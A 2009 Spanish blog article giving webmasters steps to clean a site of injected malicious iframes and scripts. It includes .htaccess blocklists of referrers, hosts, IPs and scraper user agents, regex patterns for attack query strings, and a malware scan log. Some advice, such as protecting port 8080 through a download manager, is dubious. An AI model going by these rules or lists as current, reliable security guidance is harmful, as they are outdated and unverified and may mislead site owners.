viernes, septiembre 4, 2009, 06:05 PM - FPC - Fundación Psicología y Cristianismo
WAM - Web Anti-Malware
Autor : José María Amenós Vidal. Psicólogo Clínico y Social (docencia e investigación desde 1984) por la Universidad Central de Barcelona (España). Miembro fundador y Administrador FPC.
Fundación Psicología y Cristianismo. c/ Museo, núm. 26 - 1º 1ª. 08912. Badalona (Barcelona). España. e-mail : info@psicologos.tk - url : www.psicologos.tk
Índice. Introducción. 1. Análisis, detección y eliminación de Malware. 2. Protección con contraseña del puerto 8080, actualizar a IE8 e implementar un host local. 3. Cambiar la clave de acceso FTP y modificar el archivo .htaccess. Conclusiones. Google Search y Dasient WAM - Web Anti-Malware. Apéndice. Notas y Textos. Referencias bibliográficas. Agradecimientos. Palabras Clave.
Introducción.
Escribo este breve artículo con algunas orientaciones para webmasters por si puede serles de utilidad ante la experiencia adquirida en combatir ataques malware que provienen de un servidor remoto de origen desconocido y que inyecta código malicioso en sitios legítimos.
Se preguntarán algunos que es el malware, pues todo tipo de software espía, virus informáticos, etc ... que se intenta insertar a través de iframes y/o scripts en el código fuente de las páginas web sin conocimiento del webmaster para infectar los PCs de los usuarios ...
1. Análisis, detección y eliminación de Malware.
Para detectarlos es posible descubrirlos utilizando buenos programas informáticos, ... la primera recomendación es por tanto, aconsejarles unos de los mejores ...
Windows Live OneCare (Microsoft Security Essentials) tiene un examen exhaustivo y completo que permite detectar los archivos infectados por código malicioso ... Pulse aquí.
Se debe analizar en primer lugar el propio PC por si ha resultado infectado, incluyendo en el análisis completo del sistema, una copia de seguridad de los archivos del sitio web infectado, ... al cabo de unas horas se nos indicará aquellos archivos infectados en nuestro ordenador que deben ser eliminados ... En cualquier caso, es necesario limpiar tanto nuestro PC como modificar aquellos archivos de la copia de seguridad analizada de nuestra página web que resultaron infectados.
Es decir, suprimir los virus o troyanos que se han introducido en el software de nuestro ordenador, así como devolver a su estado original aquellos archivos infectados de la copia de seguridad que han incluido código malicioso (iframes, scripts, etc ...) sin nuestro conocimiento, es decir, revisar el código fuente y repararlo, o bien, sustituyendo el archivo infectado por el archivo original correspondiente a alguna de las anteriores copias de seguridad que ofrezca garantías de no haber sido alterada ... utilizando para todo ello, la suma de análisis de Malwarebytes Anti-Malware + Windows Live OneCare ... para su detección, eliminación y reparación.
Una observación muy importante es que cualquier archivo de la copia de seguridad de la web en su PC con código malicioso que deban reparar, sea abierto única y exclusivamente con el bloc de notas para modificarlo, si deciden utilizar este método en vez de sustituirlo por el archivo original ante posibles dudas ... el tipo de iframes suelen contener urls seguidas de "8080" y en cuanto a los scripts maliciosos suelen ir precedidos de una etiqueta "ad".
Aunque siendo este un buen método de trabajo para ahorrar tiempo y esfuerzo, mi recomendación es cerciorarse, y explicaré la manera posible al existir la posibilidad de la no detección por los programas anti-malware de un mínimo porcentaje de archivos infectados, ... se trata de comprobar en el servidor remoto la fecha en que fueron modificados aquellos que han sido detectados como infectados por los analizadores anti-malware en la copia de seguridad de su web en el PC, esta fecha es el indicativo de cuando hubo intrusión en el servidor remoto, siendo este el marcador para repasar los códigos fuente de todos los demás archivos .php y .html. De este modo, habremos podido comprobar la totalidad de los archivos modificados con esa fecha con el fin de cerciorarnos de que no se encuentren dañados con iframes y scripts maliciosos, y en caso de estarlo reparar su código fuente eliminando el malware, teniendo así la certeza de que han sido detectados y reparados todos los archivos infectados.
2. Protección con contraseña del puerto 8080, actualizar a IE8 e implementar un host local.
En segundo lugar, deberemos descargar otro programa necesario para proteger con contraseña nuestro puerto 8080 de la computadora, puesto que suele ser la ruta alternativa utilizada por el malware para infectarnos ... De este modo, es recomendable utilizar el complemento FDM Remote Control Server del programa de descargas Free Download Manager, que encontrarán en el sitio espejo de Source Forge (2). Pulse aquí.
En cualquier caso, es recomendable actualizar el navegador a Internet Explorer 8, porque posee una pestaña en la barra de herramientas muy útil, con el nombre "seguridad" que al marcarla despliega en su menú, la opción "directiva de privacidad de páginas web" (3).
Al marcar esta directiva de seguridad nos indica la lista de sitios que operan en su PC al abrir la dirección electrónica de nuestra página web, ... De esta manera podemos detectar entre los sitios indicados, aquellos que hayan sido insertados sin nuestra autorización ... porque nunca los hemos utilizado por alguna u otra razón en nuestra web .. siendo esta una buena medida para comprobar que la web está arreglada y saneada ... (4). Pulse aquí.
Simulación de páginas web.
Con el fin de comprobar todos los supuestos que nos encontraremos al cargar nuevamente en el servidor remoto que aloja nuestro dominio todos aquellos archivos desinfectados de nuestra copia de seguridad que debe funcionar correctamente como la original. Pulse aquí.
En ocasiones puede ser incluso necesario con la ayuda de XAMPP volver a configurar de nuevo todos los parámetros, es decir, cargar las carpetas de archivos de configuración de la página web desde el principio, como si fuera la primera vez que crea su página electrónica.
Por ejemplo, con los CMS - Content Manager System, y ante la magnitud de los daños ocasionados por el malware, se puede recurrir a volver a configurar desde el principio los archivos del servidor FTP - File Transfer Protocol y SQL - Structured Query Language reaprovechando los archivos SQL de la última copia de seguridad de la base de datos en buen estado.
3. Cambiar la clave de acceso FTP y modificar el archivo .htaccess.
Finalmente, cuando estemos seguros de que todo funciona normalmente es imprescindible que cambien la clave de acceso a su FTP en el servidor remoto, indicando este en particular por ser el sistema que generalmente se utiliza para blogs, es decir, modificar el username y password del administrador de archivos de su página web, ...
O dicho de otra manera, cambiar la contraseña de acceso al directorio que alberga por ejemplo todos los archivos de su CMS, si es este el sistema que habitualmente utilizan, como así ocurre entre otros con XOOPS 2.0. que incluye además de FTP una base de datos MySQL de los que se debe exportar regularmente una copia de seguridad para tener guardados los contenidos tanto en el servidor remoto como en el host local. Pulse aquí.
Puesto que de esta manera al estar limpio el sitio web y PC impiden que se copie de forma remota desde un servidor desconocido la nueva contraseña encriptada ... y aseguran la web y su ordenador contra intrusiones procedentes del mismo malware que originó el ataque ...
De forma alternativa pueden fortalecer y proteger mayormente su página electrónica complementando todas estas medidas de seguridad con la modificación del archivo .htaccess de su servidor remoto, añadiendo a su contenido un nuevo código de seguridad mediante el uso del bloc de notas, pero para ello deben seguir las recomendaciones de un administrador de sistemas, porque se trata de lenguaje de programación y se necesita una persona especializada en seguridad informática. Aunque aquí les dejo un ejemplo de lo que deberían insertar y comprobar en el host local antes de subir el archivo .htaccess al servidor remoto con el fin de constatar el buen funcionamiento de su página web tras los cambios experimentados de modo que quede mejor asegurada ante posibles intrusiones no deseadas (5).
A. Código específico.
El código a insertar en el archivo .htaccess según el administrador de sistemas que lo ha diseñado con pseudónimo "emisho" de Falkland Islands es el siguiente :
I. Bloquea spammers, hackers, etc ...
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?gameday.de.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?play-texas-holdem.gameday.de.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?forever.kz.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?craps.forever.kz.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?roulette-online.forever.kz.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?play-poker.forever.kz.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?onlinecasino.forever.kz.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?texashold-em.freeservers.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?playonline.inn7winter.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?poker-new.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?available-poker.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?free-poker.available-poker.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?texasholdem.prv.pl.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?prv.pl.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?homestead.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?texaspoker.homestead.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?t-e-x-a-s-poker.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?texas-poker.olo.cc.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?holdem-poker.servertown.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?online-poker.played.by.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?empire-poker.black-poker.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?black-poker.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?free.fr.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?pc800cdf.free.fr.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?free-poker.standard-poker.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?cameralover.net.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?golfshoot.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?bitlocker.net.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?bayfronthomes.net.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?cafexml.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?turniptruck.com.*$ [NC]
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?trojan-horse.co.uk.*$ [NC]
RewriteRule .* - [F,L]
II. Evita proxys y otros sitios no seguros ...
RewriteCond %{REMOTE_HOST} adm-muenchen\.de [NC,OR]
RewriteCond %{REMOTE_HOST} cyveillance\.com [NC,OR]
RewriteCond %{REMOTE_HOST} lightspeedsystems\.com [NC,OR]
RewriteCond %{REMOTE_HOST} pea016-29980-net-adsl-01\.altohiway\.com [NC,OR]
RewriteCond %{REMOTE_HOST} smartservercontrol\.com [NC,OR]
RewriteCond %{REMOTE_HOST} syntryx\.com [NC,OR]
RewriteCond %{REMOTE_HOST} proxad\.net [NC]
RewriteRule ^.*$ - [F]
III. Bloquea IPs inseguras.
Order Allow,Deny
Allow from All
Deny from 38.118.42.36
Deny from 38.118.42.38
Deny from 58.233.142.144
Deny from 59.42.55.46
Deny from 62.77.178.22
Deny from 63.148.99
Deny from 70.84.132.74
Deny from 82.77.200.162
Deny from 83.116.211.100
Deny from 129.35.81.16
Deny from 142.131.18.2
Deny from 193.120.138.82
Deny from 200.114.66.249
Deny from 202.155.14.223
Deny from 211.157.8.43
Deny from 212.129.232.100
Deny from 212.141.49.20
Deny from 213.239.236.18
Deny from 220.194.54.26
Deny from 38.118.25.59
Deny from 62.252.32.14
Deny from 64.94.136.196
Deny from 65.183.39.107
Deny from 66.17.15.154
Deny from 69.118.3.227
Deny from 69.225.183.82
Deny from 70.253.192.107
Deny from 81.56.134.150
Deny from 81.144.218.50
Deny from 83.156.142.136
Deny from 129.33.184.57
Deny from 194.223.6.5
Deny from 213.83.89.5
Deny from 217.109.185.32
Deny from 12.22.85.3
Deny from 147.230.50.100
Deny from 148.244.150.58
Deny from 165.138.213.230
Deny from 193.159.244.70
Deny from 193.170.65.247
Deny from 194.102.61.162
Deny from 200.167.245.13
Deny from 200.168.105.137
Deny from 200.212.114.3
Deny from 200.56.224.5
Deny from 203.162.27.
Deny from 206.212.187.26
Deny from 207.195.241.4
Deny from 207.44.154.35
Deny from 207.72.66.5
Deny from 208.18.125.231
Deny from 208.53.138.8
Deny from 209.213.127.46
Deny from 209.71.222.11
Deny from 211.157.
Deny from 211.249.118.
Deny from 212.179.154.242
Deny from 212.199.163.143
Deny from 212.199.169.153
Deny from 212.235.18.85
Deny from 212.235.66.240
Deny from 212.91.171.252
Deny from 213.130.118.121
Deny from 213.56.68.29
Deny from 213.56.73.3
Deny from 213.91.217.116
Deny from 216.128.69.140
Deny from 216.139.176.60
Deny from 216.190.203.162
Deny from 216.204.237.10
Deny from 217.120.32.183
Deny from 217.121.100.124
Deny from 217.132.202.119
Deny from 217.160.75.202
Deny from 218.20.116.80
Deny from 218.5.27.115
Deny from 218.85.82.95
Deny from 218.85.83.168
Deny from 220.160.2.167
Deny from 220.160.4.75
Deny from 220.181.26.108
Deny from 221.3.235.
Deny from 24.69.156.45
Deny from 61.144.185.75
Deny from 61.172.65.176
Deny from 61.30.47.21
Deny from 61.30.47.22
Deny from 62.148.230.
Deny from 62.168.39.178
Deny from 62.193.231.242
Deny from 62.194.10.194
Deny from 62.219.59.122
Deny from 63.145.202.2
Deny from 63.148.99.234
Deny from 63.252.226.68
Deny from 64.34.166.88
Deny from 64.34.168.29
Deny from 64.34.200.200
Deny from 64.141.68.16
Deny from 65.75.139.90
Deny from 65.75.146.170
Deny from 65.75.166.110
Deny from 65.75.175.30
Deny from 65.77.131.66
Deny from 65.94.44.50
Deny from 65.94.45.31
Deny from 66.150.40.221
Deny from 66.199.247.74
Deny from 66.246.252.87
Deny from 66.246.252.88
Deny from 66.254.99.174
Deny from 66.33.197.209
Deny from 66.93.178.158
Deny from 66.98.152.93
Deny from 66.98.162.34
Deny from 67.15.130.23
Deny from 68.208.4.19
Deny from 69.0.197.227
Deny from 69.156.204.43
Deny from 69.163.158.82
Deny from 69.50.170.122
Deny from 69.50.170.162
Deny from 72.36.199.154
Deny from 80.132.64.103
Deny from 80.237.140.233
Deny from 80.58.11.107
Deny from 80.58.22.107
Deny from 80.58.4.107
Deny from 80.95.
Deny from 81.169.169.201
Deny from 81.4.89.10
Deny from 82.103.65.
Deny from 82.81.204.164
Deny from 82.81.228.82
Deny from 84.189.
Deny from 84.244.5.173
IV. Evita navegadores maliciosos.
RewriteCond %{HTTP_USER_AGENT} ^$ [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [NC,OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp:: [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Schmozilla [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^webcollage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeuse [NC]
RewriteRule ^.*$ - [F]
B. Código genérico.
Hemos visto un código específico de ejemplo, ahora mencionaremos un código genérico para incluir en el archivo .htaccess que con pseudónimo "rancitis" de Argentina, lo tenemos en el que a continuación se indica :
########## Begin
#
# Bloquear cualquier script intentando de setear un valor mosConfig a traves de la URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Bloquear cualquier script que intente base64_encode para enviar via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Bloquear cualquier script que incluya una etiqueta <script> en la URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Bloquear cualquier script que intente de setear alguna variable PHP GLOBALS via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Bloquear cualquier script que intente modificar una variable _REQUEST via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Enviar todas las peticiones bloqueadas al homepage con un error 403!
RewriteRule ^(.*)$ index.php [F,L]
#
########## EndEn realidad, los tres pasos fundamentales primera y anteriormente citados son los más importantes, para proteger a los usuarios y su sitio legítimo de posibles infecciones a causa de la inserción de código malicioso sin su conocimiento ... el complemento del archivo .htaccess es para fortalecer su protección ante nuevos ataques de malware.
Conclusiones.
Google Search y Dasient WAM - Web Anti-Malware.
Deberán utilizar las herramientas del webmaster, y seguir las instrucciones para introducir un código "meta" entre las etiquetas "head" antes de "body" de su web, ... para verificar que Ud. es el propietario del sitio en la red, ...
Y posteriormente utilizar el formulario habilitado al efecto y dirigir un correo al staff de Google search para que vuelvan a comprobar su sitio ya limpio de malware para conseguir eliminar el aviso de sitio malicioso. Pulse aquí.
Google Safe Browsing y Malware Domain List.
Una herramienta para webmasters de gran utilidad para los internautas es la página de diagnóstico de navegación segura de Google safe browsing que combinada a la lista de dominios maliciosos de Malware domain list nos ofrece una buena manera de distinguir los sitios seguros e inseguros.
El funcionamiento consiste en añadir la dirección electrónica de cualquier sitio en Internet que queramos diagnosticar a la url de Google safe browsing, por ejemplo, del dominio malwaredomainlist.com que nos ofrece dicha lista de dominios maliciosos.
Del siguiente modo : http://www.google.es/safebrowsing/diagnostic?site=malwaredomainlist.com
Es un buen modo, para determinar los sitios legítimos y/o que han sido victimas de inyección de código malintencionado por servidores remotos que contienen dominios maliciosos.
Herramientas para webmasters.
Mejora la visibilidad de tu sitio en los resultados de la búsqueda de Google. De forma gratuita.
Herramientas para webmasters de Google te brinda informes detallados acerca de la visibilidad de tus páginas en Google. Para comenzar, añade y verifica tu sitio e inmediatamente comenzarás a ver información.
Obtén el punto de vista de Google sobre tu sitio y diagnostica los problemas
Conoce el mecanismo de Google para rastrear e indexar tu sitio, así como los problemas específicos que experimentamos para acceder a él.
Descubre tu enlace y consulta el tráfico.
Visualiza, clasifica y descarga información completa acerca de los enlaces internos y externos a tu sitio con nuevas herramientas de informe de enlaces. Descubre las consultas que generan tráfico hacia tu sitio y la ruta que siguen exactamente los usuarios para llegar a él.
Comparte información sobre tu sitio.
Envíanos comentarios sobre tus páginas a través de Sitemaps: cuáles son las más importantes para ti y con qué frecuencia cambian. También nos puedes apuntar cómo te gustaría que aparecieran las urls que indexamos.
Detalles de malware y rendimiento del sitio.
La lectura de la seguridad según el rendimiento de la página web es un indicativo del buen funcionamiento de las medidas de protección del sitio en la red.
Las páginas de estrategia.info tardan una media de 1,2 segundos en cargarse (actualizado el 03/12/2009).
El tiempo de carga medio de nuestro sitio es más rápido que el del 85 % de los sitios en la red.
El rendimiento muestra cómo ha cambiado el tiempo de carga de página medio del sitio a lo largo de los últimos meses, es decir, diferenciando entre tiempos de carga rápidos y lentos, estos últimos se producían hace más de 90 días en el periodo comprendido entre el 25 de junio y 3 de septiembre de 2009, periodo durante el cual tuvimos que tomar medidas de seguridad para protegernos de los ataques de la piratería informática.
Google Labs sigue indicando para el dominio y subdominios de estrategia.info un lugar de navegación segura sin detección de malware y con un rendimiento máximo optimizado ...
Apéndice.
Malware e Internet : ejemplos prácticos.
Observaciones.
Desde Internet se produce la infección de la unidad C del disco duro del PC, en varias carpetas del sistema, el origen es muy diverso y para entender más sobre esta cuestión en particular nos remitimos al apartado : Google Safe Browsing y Malware Domain List, su desinfección se puede realizar automáticamente a través del programa Malwarebytes Anti-Malware, o de forma manual, accediendo a la carpeta específica del subsistema, ... el modo de proceder en este segundo caso, es insertando el directorio en la ventana de direcciones de su navegador, del siguiente modo :
Por ejemplo, en el caso del agente troyano (trojan agent) de banca online iExplorer.exe que se encontraría en la ubicación C:\WINDOWS\iExplorer.exe debería introducir C:\WINDOWS en la barra de direcciones del navegador, como si quisiera visitar un sitio en Internet, y se abriría la carpeta que contiene la aplicación infectada iExplorer.exe, entonces lo único que tendría que hacer es suprimirlo para enviarlo a la papelera, y posteriormente vaciarla.
Sin embargo, en ocasiones estos troyanos permanecen ocultos, para visualizarlos tras acceder a la ubicación de su carpeta o subcarpeta contenedora, debería mostrar en su PC los archivos ocultos de la manera que se indica a continuación :
En el menú "Inicio" debe acceder a "Panel de control" y una vez allí abrir "Apariencia y temas", y después "Opciones de carpeta", después al desplegarse la ventana de diálogo, en la opción "Ver" deberá marcar la casilla "Mostrar todos los archivos y carpetas ocultos" y marcar "Aceptar" ...
Finalmente, cuando haya localizado las aplicaciones o archivos ocultos infectados, tras eliminarlos puede devolver la visibilidad de archivos o carpetas a su situación original, siguiendo los mismos pasos indicados, pero deberá en esta ocasión desmarcar la opción de "Mostrar todos los archivos y carpetas ocultos", o si bien, marcar la opción "Restaurar valores predeterminados", y después "Aceptar".
Advertencia.
No debe abrir las aplicaciones o archivos infectados, ... solamente la carpeta o subcarpeta que los contiene ... para acceder a eliminarlos.
Ejemplos.
Troyanos habituales en la red y desinfectados del PC de forma automática y/o manual ...
(*) Rutas de acceso y malware (en negrita).
Elementos de Datos del Registro Infectados:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (Trojan.Agent) -> Data: c:\windows\system32\userinit.exe -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (Trojan.Agent) -> Data: system32\userinit.exe -> Quarantined and deleted successfully.
Ficheros Infectados:
C:\Documents and Settings\HP_Propietario\Datos de programa\wiaserva.log (Malware.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\iExplorer.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\WINDOWS\ServicePackFiles\i386\userinit.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\WINDOWS\SoftwareDistribution\Download\ 4fcdf3a74fe834ce16dc12a720df5cc7\userinit.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\WINDOWS\system\MSRLE.DRV (Trojan.Downloader) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246- D116-4BE8-92FC-1AFE1F338C80}\RP185\A0032258.exe (Adware.ADON) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039084.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039103.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039082.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039083.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039085.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039086.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039087.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039088.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039089.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039090.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039091.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039092.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039093.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039094.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039095.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039098.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039099.exe (Trojan.Agent) -> Quarantined and deleted successfully.
